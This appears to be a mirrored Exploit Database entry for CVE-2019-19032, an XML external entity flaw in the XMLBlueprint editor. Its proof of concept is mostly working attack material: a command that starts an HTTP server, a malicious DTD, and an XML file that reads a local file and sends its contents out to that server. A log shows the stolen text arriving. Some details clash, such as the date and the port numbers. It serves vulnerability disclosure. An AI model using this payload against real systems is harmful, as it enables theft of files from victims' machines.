XMLBlueprint 16.191112 – XML External Entity Injection

• Exploit Database
• 15 阅读

• 作者： Javier Olmedo
  日期： 2020-01-29
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47974/

• # Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
  # Exploit Author: Javier Olmedo
  # Date: 2018-11-14
  # Vendor: XMLBlueprint XML Editor
  # Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
  # Affected Version: 16.191112 and before
  # Patched Version: unpatched
  # Category: Local
  # Platform: XML
  # Tested on: Windows 10 Pro
  # CWE: https://cwe.mitre.org/data/definitions/611.html
  # CVE: 2019-19032
  # References:
  # https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
   
  # 1. Technical Description
  # XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
  # Injection vulnerability through the malicious XML file. This allows a malicious user
  # to read arbitrary files.
   
  # 2. Proof Of Concept (PoC)
  # 2.1 Start a webserver to receive the connection.
  
  python -m SimpleHTTPServer 80
  
  # 2.2 Upload the payload.dtd file to your web server.
  
  <?xml version="1.0" encoding="UTF-8"?>
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
  %all;
  
  # 2.3 Create a secret.txt file with any content in desktop.
  
  # 2.4 Open poc.xml and click XML -> Validate
  
  <?xml version="1.0"?>
  <!DOCTYPE test [
  <!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
  <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
  %dtd;]>
  <pwn>&send;</pwn>
  
  # 2.5 Your web server will receive a request with the contents of the secret.txt file
  
  Serving HTTP on 0.0.0.0 port 8000 ...
  192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
  192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
  
  # 3. Timeline
  # 13, november 2019 - [RESEARCHER] Discover
  # 13, november 2019 - [RESEARCHER] Report to vendor support
  # 14, november 2019 - [DEVELOPER]Unrecognized vulnerability
  # 15, november 2019 - [RESEARCHER] Detailed vulnerability report
  # 22, november 2019 - [RESEARCHER] Public disclosure
  
  # 4. Disclaimer
  # The information contained in this notice is provided without any guarantee of use or otherwise.
  # The redistribution of this notice is explicitly permitted for insertion into vulnerability
  # databases, provided that it is not modified and due credit is granted to the author.
  # The author prohibits the malicious use of the information contained herein and accepts no responsibility.
  # All content (c)
  # Javier Olmedo